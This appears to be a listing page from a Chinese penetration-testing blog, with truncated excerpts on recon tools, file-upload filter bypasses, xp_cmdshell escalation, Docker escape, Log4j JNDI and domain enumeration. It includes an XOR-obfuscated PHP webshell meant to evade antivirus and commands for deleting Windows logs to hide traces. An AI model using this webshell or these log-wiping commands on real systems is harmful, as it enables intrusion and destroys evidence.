上一页 1 ··· 3 4 5 6 7 8 9 10 下一页
摘要: 基础知识点 url大小写判断windows(不敏感)和linux(敏感)服务器 bugscanner.com、 云悉 等cms识别 awvs,nessus,appscan,netsparker漏洞扫描工具 fuzzscaner 信息收集工具 反向连接 用 域名映射或代理 防止被追踪 #本地网络 su 阅读全文
posted @ 2023-03-24 22:16 hello_bao 阅读(289) 评论(0) 推荐(0)
摘要: 1、oracleshell提权工具 (冰蝎作者) 阅读全文
posted @ 2023-03-24 22:04 hello_bao 阅读(112) 评论(0) 推荐(0)
摘要: 1、异或运算 过免杀 无字符后门 '!' ^ '@' -->‘a’ 异或运算 过免杀 <?php $a='!' ^ '@' .'ssert' ; $a($_POST['x']); ?> for i in range(1,127): for j in range(1, 127): k = i ^j i 阅读全文
posted @ 2023-03-24 21:47 hello_bao 阅读(170) 评论(0) 推荐(0)
摘要: 文件上传getshell 验证绕过 注意组合使用: 1、末尾 点+空格+点+空格--》1.php . . . \1.php. . . 2、文件后缀末尾加::$data--》php+windows:文件名+"::$DATA",会把::$DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$D 阅读全文
posted @ 2023-03-24 21:43 hello_bao 阅读(114) 评论(0) 推荐(0)
摘要: 1、XP_cmdshell提权 xp_cmdshell 在 mssql2000 中是默认开启的,在 mssql2005 之后的版本中默认禁止。 如果拥有管理员 sa 权限,则可以用 sp_configure 重新开启它。 启用xp_cmdshell: EXEC sp_configure 'show 阅读全文
posted @ 2023-03-23 22:53 hello_bao 阅读(372) 评论(0) 推荐(0)
摘要: 如果是 物理机运行虚拟机,虚拟机运行Docker容器 的情况,还要进行 虚拟机逃逸。 Docker 逃逸的原因可以划分为三种: 由内核漏洞引起 ——Dirty COW(CVE-2016-5195) 由 Docker 软件设计引起——CVE-2019-5736(runC )、CVE-2019-1427 阅读全文
posted @ 2023-03-23 21:48 hello_bao 阅读(2126) 评论(0) 推荐(0)
摘要: 1、漏洞原理 JNDI:Java Naming and Directory Interface(java命名和目录接口)。 LDAP:Lightweight Directory Access Protocol(轻型目录访问协议)。 RMI:Remote Method Invoke(远程方法调用)。 阅读全文
posted @ 2023-03-23 20:28 hello_bao 阅读(2545) 评论(0) 推荐(0)
摘要: chcp 65001 #修改编码 ipconfig /all #查看网络信息 net config workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域 net user /domain # 查看所有域用户 net view /domain # 查看有几个域 net 阅读全文
posted @ 2023-03-23 20:20 hello_bao 阅读(24) 评论(0) 推荐(0)
摘要: 最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除 Windows系统: 1:用MSF中的 clearev 命令清除痕迹 2:执行命令清除日志: del %WINDR%\* .log /a/s/q/f 3、全量清理,windows主机三大核心【系统、安全、应用程序】日志清理 PowerShell - 阅读全文
posted @ 2023-03-23 13:54 hello_bao 阅读(684) 评论(0) 推荐(0)
摘要: 渗透过程概述: 1、信息收集-->sql注入漏洞-->后台文件上传漏洞getshell 下载hdh cms源码,收集信息。注册admin用户,验证用户存在。search.aspx存在sql注入漏洞,MDB Viewer打开数据库,sqlmap设置tamper=randomcase过waf,根据表结构 阅读全文
posted @ 2023-03-23 13:44 hello_bao 阅读(1218) 评论(0) 推荐(0)
上一页 1 ··· 3 4 5 6 7 8 9 10 下一页